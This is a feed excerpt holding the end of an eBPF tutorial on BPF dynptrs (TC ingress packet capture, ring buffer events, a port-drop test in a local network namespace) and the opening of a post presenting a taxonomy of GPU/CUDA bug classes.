        &lt;span class="n"&gt;fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"Usage: %s -i &amp;lt;ifname&amp;gt; [-p port] [-s len] [-n]&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;ifindex&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;if_nametoindex&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ifname&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;ifindex&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="n"&gt;perror&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"if_nametoindex"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;signal&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;SIGINT&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;sig_handler&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;signal&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;SIGTERM&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;sig_handler&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;dynptr_tc_bpf&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;dynptr_tc_bpf__open_and_load&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="n"&gt;fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"Failed to load BPF&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="cm"&gt;/* Configure */&lt;/span&gt;
    &lt;span class="n"&gt;bpf_map_update_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;bpf_map__fd&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;maps&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;cfg_map&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;__u32&lt;/span&gt;&lt;span class="p"&gt;){&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;cfg&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_ANY&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="cm"&gt;/* Attach to TC ingress */&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_tc_hook&lt;/span&gt; &lt;span class="n"&gt;hook&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;sz&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hook&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ifindex&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ifindex&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;attach_point&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;BPF_TC_INGRESS&lt;/span&gt; &lt;span class="p"&gt;};&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_tc_opts&lt;/span&gt; &lt;span class="n"&gt;opts&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;sz&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;opts&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;handle&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;priority&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                                &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;prog_fd&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_program__fd&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;progs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;dynptr_tc_ingress&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;};&lt;/span&gt;

    &lt;span class="n"&gt;bpf_tc_hook_create&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;hook&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;bpf_tc_attach&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;hook&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;opts&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="n"&gt;fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"TC attach failed&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="k"&gt;goto&lt;/span&gt; &lt;span class="n"&gt;cleanup&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;ring_buffer&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;rb&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;cfg&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;enable_ringbuf&lt;/span&gt; &lt;span class="o"&gt;?&lt;/span&gt;
        &lt;span class="n"&gt;ring_buffer__new&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;bpf_map__fd&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;maps&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;events&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="n"&gt;handle_event&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Attached to %s. blocked_port=%u snap_len=%u&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ifname&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cfg&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;blocked_port&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cfg&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;snap_len&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;exiting&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;rb&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;ring_buffer__poll&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;rb&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;100&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="n"&gt;usleep&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;100000&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;ring_buffer__free&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;rb&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;bpf_tc_detach&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;hook&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;opts&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;bpf_tc_hook_destroy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;hook&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="nl"&gt;cleanup:&lt;/span&gt;
    &lt;span class="n"&gt;dynptr_tc_bpf__destroy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Understanding the User-Space Code
&lt;/h3&gt;

&lt;p&gt;The userspace program loads the BPF skeleton, configures it through the array map, and attaches to TC ingress. The ring buffer callback &lt;code&gt;handle_event()&lt;/code&gt; receives each variable-length event and prints it.&lt;/p&gt;

&lt;p&gt;Notice how we access the variable-length payload. The &lt;code&gt;struct event_hdr&lt;/code&gt; has a flexible array member &lt;code&gt;payload[]&lt;/code&gt; at the end. When an event arrives, &lt;code&gt;data_sz&lt;/code&gt; tells us the total size, and &lt;code&gt;e-&amp;gt;snap_len&lt;/code&gt; tells us specifically how much payload was included. We validate both before accessing the payload bytes.&lt;/p&gt;

&lt;p&gt;The configuration map allows runtime control over blocking behavior and snapshot length without reloading the BPF program. This demonstrates the common pattern of using maps for user-to-kernel communication.&lt;/p&gt;

&lt;h2&gt;
  
  
  Compilation and Execution
&lt;/h2&gt;

&lt;p&gt;Navigate to the dynptr directory and build:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cd &lt;/span&gt;bpf-developer-tutorial/src/features/dynptr
make
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This compiles the BPF program with the repository's standard toolchain, generating the skeleton header and linking against libbpf.&lt;/p&gt;

&lt;h3&gt;
  
  
  Creating a Test Environment
&lt;/h3&gt;

&lt;p&gt;To test properly, we need a network namespace so traffic actually traverses the veth pair rather than going through loopback. The included &lt;code&gt;test.sh&lt;/code&gt; script handles this automatically, but here's the manual setup:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Create network namespace&lt;/span&gt;
&lt;span class="nb"&gt;sudo &lt;/span&gt;ip netns add test_ns

&lt;span class="c"&gt;# Create veth pair with one end in the namespace&lt;/span&gt;
&lt;span class="nb"&gt;sudo &lt;/span&gt;ip &lt;span class="nb"&gt;link &lt;/span&gt;add veth_host &lt;span class="nb"&gt;type &lt;/span&gt;veth peer name veth_ns
&lt;span class="nb"&gt;sudo &lt;/span&gt;ip &lt;span class="nb"&gt;link set &lt;/span&gt;veth_ns netns test_ns

&lt;span class="c"&gt;# Configure host side&lt;/span&gt;
&lt;span class="nb"&gt;sudo &lt;/span&gt;ip addr add 10.200.0.1/24 dev veth_host
&lt;span class="nb"&gt;sudo &lt;/span&gt;ip &lt;span class="nb"&gt;link set &lt;/span&gt;veth_host up

&lt;span class="c"&gt;# Configure namespace side&lt;/span&gt;
&lt;span class="nb"&gt;sudo &lt;/span&gt;ip netns &lt;span class="nb"&gt;exec &lt;/span&gt;test_ns ip addr add 10.200.0.2/24 dev veth_ns
&lt;span class="nb"&gt;sudo &lt;/span&gt;ip netns &lt;span class="nb"&gt;exec &lt;/span&gt;test_ns ip &lt;span class="nb"&gt;link set &lt;/span&gt;veth_ns up

&lt;span class="c"&gt;# Start HTTP server inside the namespace&lt;/span&gt;
&lt;span class="nb"&gt;sudo &lt;/span&gt;ip netns &lt;span class="nb"&gt;exec &lt;/span&gt;test_ns python3 &lt;span class="nt"&gt;-m&lt;/span&gt; http.server 8080 &lt;span class="nt"&gt;--bind&lt;/span&gt; 10.200.0.2 &amp;amp;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Running the Demo
&lt;/h3&gt;

&lt;p&gt;Start the dynptr TC program attached to the host side of the veth:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; ./dynptr_tc &lt;span class="nt"&gt;-i&lt;/span&gt; veth_host &lt;span class="nt"&gt;-p&lt;/span&gt; 0 &lt;span class="nt"&gt;-s&lt;/span&gt; 32
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In another terminal, make a request:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;curl http://10.200.0.2:8080/
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You should see output showing captured packets:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Attached to TC ingress of veth_host (ifindex=X). Ctrl-C to exit.
blocked_port=0 snap_len=32 ringbuf=1
if=X 10.200.0.2:8080 -&amp;gt; 10.200.0.1:XXXXX len=221 drop=0 snap=32 payload="HTTP/1.0 200 OK..Server: SimpleH"
if=X 10.200.0.2:8080 -&amp;gt; 10.200.0.1:XXXXX len=742 drop=0 snap=32 payload="&amp;lt;!DOCTYPE HTML&amp;gt;.&amp;lt;html lang="en"&amp;gt;"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The output shows HTTP response packets from the server, with the payload field containing the beginning of the response data.&lt;/p&gt;

&lt;h3&gt;
  
  
  Testing the Drop Policy
&lt;/h3&gt;

&lt;p&gt;Test blocking by specifying port 8080:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; ./dynptr_tc &lt;span class="nt"&gt;-i&lt;/span&gt; veth_host &lt;span class="nt"&gt;-p&lt;/span&gt; 8080 &lt;span class="nt"&gt;-s&lt;/span&gt; 32
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In another terminal:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;curl &lt;span class="nt"&gt;--max-time&lt;/span&gt; 3 http://10.200.0.2:8080/
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The curl should timeout since response packets are blocked. The dynptr_tc output shows &lt;code&gt;drop=1&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;if=X 10.200.0.2:8080 -&amp;gt; 10.200.0.1:XXXXX len=74 drop=1 snap=0
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Using the Test Script
&lt;/h3&gt;

&lt;p&gt;For convenience, run the included test script which handles all setup automatically:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; ./test.sh
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This creates the namespace, runs both capture and blocking tests, and cleans up afterward.&lt;/p&gt;

&lt;h2&gt;
  
  
  When to Use Dynptrs
&lt;/h2&gt;

&lt;p&gt;Dynptrs shine in several scenarios. &lt;strong&gt;Variable-length events&lt;/strong&gt; are the classic use case since ringbuf dynptrs let you allocate exactly the size you need at runtime, avoiding wasted space from oversized fixed structures or complex multi-record schemes.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Packet parsing&lt;/strong&gt; benefits from dynptrs when dealing with non-linear skbs or complex protocol stacks where traditional bounds checking becomes unwieldy. The slice API provides a cleaner abstraction that handles both linear and paged data uniformly.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Crypto and verification&lt;/strong&gt; operations like &lt;code&gt;bpf_crypto_encrypt()&lt;/code&gt;, &lt;code&gt;bpf_verify_pkcs7_signature()&lt;/code&gt;, and &lt;code&gt;bpf_get_file_xattr()&lt;/code&gt; all use dynptrs as buffer arguments, making dynptr familiarity essential for these advanced use cases.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;User ringbuf consumption&lt;/strong&gt; through &lt;code&gt;bpf_user_ringbuf_drain()&lt;/code&gt; delivers samples as dynptrs, enabling safe handling of userspace-provided data in BPF programs.&lt;/p&gt;

&lt;p&gt;For simple fixed-size operations where you know bounds at compile time, traditional approaches may be simpler. But as your BPF programs grow more sophisticated, dynptrs become increasingly valuable.&lt;/p&gt;

&lt;h2&gt;
  
  
  Summary
&lt;/h2&gt;

&lt;p&gt;BPF dynptrs provide a verifier-friendly mechanism for working with variable-length and runtime-bounded data. Rather than proving memory safety entirely through static analysis, dynptrs shift some verification to runtime checks, enabling patterns that would otherwise be impossible or extremely awkward to express.&lt;/p&gt;

&lt;p&gt;Our example demonstrated the two primary dynptr patterns: using skb dynptrs with slices for clean packet parsing, and using ringbuf dynptrs for variable-length event output. The key takeaways are to always NULL-check slice returns, always submit or discard ringbuf dynptrs, and remember that skb dynptrs require kfuncs available from Linux v6.4.&lt;/p&gt;

&lt;p&gt;As eBPF capabilities continue to expand, dynptrs form an increasingly important part of the toolkit. Whether you're building packet processors, security monitors, or performance tools, understanding dynptrs will help you write cleaner, more capable BPF programs.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;If you'd like to dive deeper into eBPF, check out our tutorial repository at &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial&lt;/a&gt; or visit our website at &lt;a href="https://eunomia.dev/tutorials/" rel="noopener noreferrer"&gt;https://eunomia.dev/tutorials/&lt;/a&gt;.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Dynptr Concept Documentation:&lt;/strong&gt; &lt;a href="https://docs.ebpf.io/linux/concepts/dynptrs/" rel="noopener noreferrer"&gt;https://docs.ebpf.io/linux/concepts/dynptrs/&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;bpf_ringbuf_reserve_dynptr Helper:&lt;/strong&gt; &lt;a href="https://docs.ebpf.io/linux/helper-function/bpf_ringbuf_reserve_dynptr/" rel="noopener noreferrer"&gt;https://docs.ebpf.io/linux/helper-function/bpf_ringbuf_reserve_dynptr/&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;bpf_dynptr_from_skb Kfunc:&lt;/strong&gt; &lt;a href="https://docs.ebpf.io/linux/kfuncs/bpf_dynptr_from_skb/" rel="noopener noreferrer"&gt;https://docs.ebpf.io/linux/kfuncs/bpf_dynptr_from_skb/&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;bpf_dynptr_slice Kfunc:&lt;/strong&gt; &lt;a href="https://docs.ebpf.io/linux/kfuncs/bpf_dynptr_slice/" rel="noopener noreferrer"&gt;https://docs.ebpf.io/linux/kfuncs/bpf_dynptr_slice/&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Kernel Kfuncs Documentation:&lt;/strong&gt; &lt;a href="https://docs.kernel.org/bpf/kfuncs.html" rel="noopener noreferrer"&gt;https://docs.kernel.org/bpf/kfuncs.html&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tutorial Repository:&lt;/strong&gt; &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This example requires Linux kernel 6.4 or newer for the skb dynptr kfuncs. The ringbuf dynptr helpers are available from Linux 5.19. Complete source code is available in the tutorial repository.&lt;/p&gt;

</description>
      <category>ebpf</category>
      <category>verifier</category>
      <category>tutorial</category>
    </item>
    <item>
      <title>A Taxonomy of GPU Bugs: 19 Defect Classes for CUDA Verification</title>
      <dc:creator>云微</dc:creator>
      <pubDate>Tue, 10 Feb 2026 07:53:16 +0000</pubDate>
      <link>https://forem.com/yunwei37/a-taxonomy-of-gpu-bugs-19-defect-classes-for-cuda-verification-169f</link>
      <guid>https://forem.com/yunwei37/a-taxonomy-of-gpu-bugs-19-defect-classes-for-cuda-verification-169f</guid>
      <description>&lt;h2&gt;
  
  
  Introduction
&lt;/h2&gt;

&lt;p&gt;GPU programming introduces a distinct class of correctness and performance challenges that differ fundamentally from traditional CPU-based systems. The SIMT (Single Instruction, Multiple Threads) execution model, hierarchical memory architecture, and massive parallelism create unique bug patterns that require specialized verification and detection techniques.&lt;/p&gt;

&lt;p&gt;Just as eBPF enables safe, verified extension code to run inside the Linux kernel, &lt;a href="https://github.com/eunomia-bpf/bpftime" rel="noopener noreferrer"&gt;bpftime gpu_ext&lt;/a&gt; (The &lt;a href="https://arxiv.org/abs/2512.12615" rel="noopener noreferrer"&gt;arxiv&lt;/a&gt;, previous name &lt;a href="https://dl.acm.org/doi/10.1145/3723851.3726984" rel="noopener noreferrer"&gt;eGPU&lt;/a&gt;) bring eBPF to GPUs, allowing user-defined policy code (for observability, scheduling, or resource control) to be injected into GPU drivers and kernels with &lt;strong&gt;static verification guarantees&lt;/strong&gt;. Such a GPU extension framework must ensure that policy code cannot introduce crashes, hangs, data races, or unbounded overhead. A critical concern in modern GPU deployments is &lt;strong&gt;performance interference in multi-tenant environments&lt;/strong&gt;: contention for shared resources makes execution time unpredictable. "Making Powerful Enemies on NVIDIA GPUs" studies how adversarial kernels can amplify slowdowns, arguing that performance interference is a &lt;em&gt;system-level safety&lt;/em&gt; property when GPUs are shared. This motivates treating bounded overhead as a correctness property, not merely an optimization goal.&lt;/p&gt;

&lt;p&gt;To build a sound GPU extension verifier, we must first understand what can go wrong. This taxonomy identifies the defect classes a verifier must address, drawing lessons from eBPF's success: restrict the programming model, enforce bounded execution, and verify memory safety before loading. We synthesize findings from static verifiers (GPUVerify, GKLEE, ESBMC-GPU), dynamic detectors (Compute Sanitizer, Simulee, CuSan), and empirical bug studies (Wu et al., ScoRD, iGUARD) into 19 defect classes organized along two dimensions: impact type (Safety, Correctness, Performance) and GPU specificity (GPU-specific, GPU-amplified, CPU-shared). Each entry provides concrete examples, documents detection tools, and offers actionable verification strategies.&lt;/p&gt;




&lt;h2&gt;
  
  
  Taxonomy Overview
&lt;/h2&gt;

&lt;p&gt;Each bug class is categorized along four dimensions:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Impact Type:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Safety&lt;/strong&gt;: Program fails to complete safely (crash, hang, isolation failure, deadlock)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Correctness&lt;/strong&gt;: Program completes but produces wrong results&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Performance&lt;/strong&gt;: Program works correctly but inefficiently&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;GPU Specificity:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;GPU-specific&lt;/strong&gt;: Unique to GPU/SIMT execution model&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;GPU-amplified&lt;/strong&gt;: Exists on CPUs but much more severe on GPUs&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;CPU-shared&lt;/strong&gt;: Similar on both platforms&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Verification Scope (for GPU extension frameworks):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
